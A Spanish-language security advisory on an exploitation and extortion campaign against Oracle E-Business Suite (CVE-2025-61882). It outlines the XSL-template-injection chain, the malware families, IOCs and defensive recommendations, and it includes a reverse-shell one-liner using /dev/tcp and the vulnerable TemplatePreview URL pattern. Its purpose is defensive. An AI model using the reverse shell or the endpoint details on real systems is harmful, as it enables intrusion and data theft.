nvestigadores han documentado una campaña a gran escala que, desde al menos julio-agosto de 2025, ha utilizado sofisticadas cadenas de explotación contra Oracle E-Business Suite (EBS). El objetivo: lograr la ejecución remota de código y extraer datos de cientos de organizaciones a nivel global.
Tras el robo de información, los atacantes iniciaron una oleada de correos de extorsión dirigidos a ejecutivos, afirmando tener los datos robados y exigiendo un pago bajo la notoria marca del grupo de ransomware CL0P.
La Explotación: Combinación de Múltiples Fallas
Oracle lanzó parches de emergencia en octubre de 2025 para mitigar la falla principal, identificada como CVE-2025-61882 (CVSS 9.8).
Sin embargo, el análisis técnico revela que la explotación es mucho más compleja que un solo error. Los atacantes combinan múltiples primitivas de seguridad, como SSRF, CRLF injection, bypass de autenticación e inyección de plantilla XSL, para lograr la ejecución remota de código en las instancias de EBS.
Cronología Clave del Ataque
10 de julio de 2025: Se observa actividad sospechosa en registros, incluyendo escaneos e intentos de explotación.
8–9 de agosto de 2025: GTIG detecta la explotación temprana de CVE-2025-61882 en algunos entornos EBS.
29 de septiembre de 2025: Inicio de la campaña masiva de extorsión a ejecutivos, con cientos de mensajes enviados desde cuentas de terceros comprometidos.
2–4 de octubre de 2025: Oracle publica los parches de emergencia. GTIG y Mandiant publican el análisis técnico completo e IOCs.
Profundizando en la Técnica de Explotación
Los atacantes demostraron un conocimiento profundo de Oracle EBS, empleando al menos dos vectores principales para la ejecución de código:
- UiServlet/Vista previa de plantilla (inyección XSL)
El vector principal implica el punto final /OA_HTML/OA.jsp con el parámetro TemplatePreviewPG. Los atacantes almacenaban una plantilla XSL maliciosa en la tabla XDO_TEMPLATES_Bde la base de datos de EBS.
- Esta plantilla XSL contenía una carga útil Base64 que, al ser evaluada por los motores Java del servidor, decodificaba y ejecutaba código Java (por ejemplo, usando javax.script.ScriptEngineManagerpara ejecutar JS/Java). Este mecanismo permitió desplegar descargadores y cargadores directamente en la memoria del servidor.
- Explotación de SyncServlet
Utilizaron solicitudes POSTpara /OA_HTML/SyncServletmanipular flujos internos que permiten escribir plantillas XSL en la base de datos y luego disparar su ejecución mediante la vista previa (Template Preview). Esto resultó en la carga de payloads Java maliciosos que actuaron como loaders.
Cargas útiles y Malware Observados
Se identifican cargas útiles altamente evasivas, diseñadas para la persistencia y el control remoto:
- GOLDVEIN.JAVA: Un descargador de Java que contacta a un C2. Disfraza su comunicación de beacon como un handshake TLSv3.1 y oculta los resultados en comentarios HTML de la respuesta.
- Cadena SAGE*: Un conjunto modular de malware que incluye SAGEGIFT (cargador reflectante Java para WebLogic), SAGELEAF (gotero en memoria) y SAGEWAVE (un filtro servlet persistente capaz de desplegar cifrados ZIP).
Además, las cadenas combinan primitivas para abrir shells reversos (ej. bash -i >& /dev/tcp/<ip>/<port> 0>&1) y ejecutar comandos de reconocimiento como el usuario de la aplicación applmgr.
Atribución: ¿CL0P o FIN11?
GTIG y Mandiant observan una superposición de tácticas y herramientas con campañas históricas asociadas a FIN11 y al ecosistema CL0P. Aunque la campaña usa abiertamente la marca CL0P (sitio DLS), los investigadores mantienen la cautela y no hacen una atribución única y definitiva. La evaluación apunta a una asociación, dada la sofisticación y el historial de ambos grupos.
RECOMENDACIONES
Crítico
- Aplicar parches de Oracle EBS: Instale de inmediato los parches de emergencia de octubre de 2025 para CVE-2025-61882. Prioriza las instancias expuestas a Internet.
- Bloquear Peticiones Sospechosas: En tu WAF o proxy inverso, bloquea o monitoriza solicitudes al patrón TemplatePreview detallado abajo. Alerta sobre la creación de plantillas XSL en la base de datos.
- Patrón de Alto Riesgo: /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=<TMP|DEF><HEX>&TemplateType=<XSL-TEXT|XML>
- Inspección Forense de EBS: Revisa la tabla XDO_TEMPLATES_Ben busca de entradas recientes con TemplateCodeprefijado como TMP o DEF y contenido XSL sospechoso (ej. uso de b64: decodeBuffero javax.script.ScriptEngineManager).
- Monitorear y Bloquear IOCs Conocidos:
- IPs observadas: 200.107.207[.]26 y161.97.99[.]49
- Correos de extorsión: Monitorea y bloquea remitentes como support@pubstorm.comy support@pubstorm.net.
Alto
- Búsqueda de Persistencia (Threat Hunting): Busca shells reversos, procesos Java inusuales, conexiones de salida a C2 y transferencias de datos grandes (exfiltración) hacia hosts no habituales.
- Reforzar Credenciales: Rota las credenciales de cuentas de servicio afectadas (applmgr), fuerza MFA en accesos administrativos y auditoría privilegios.
Estratégico
- Segmentación y Reducción de Superficie: No expongas EBS directamente a Internet si no es estrictamente necesario. Usa bastion/jump hosts, WAF con inspección profunda y listas blancas de IP.
- Simulaciones: Incluye escenarios de inyección XSL/ Template Preview en tus pruebas de Red Team y ejercicios de respuesta a incidentes.
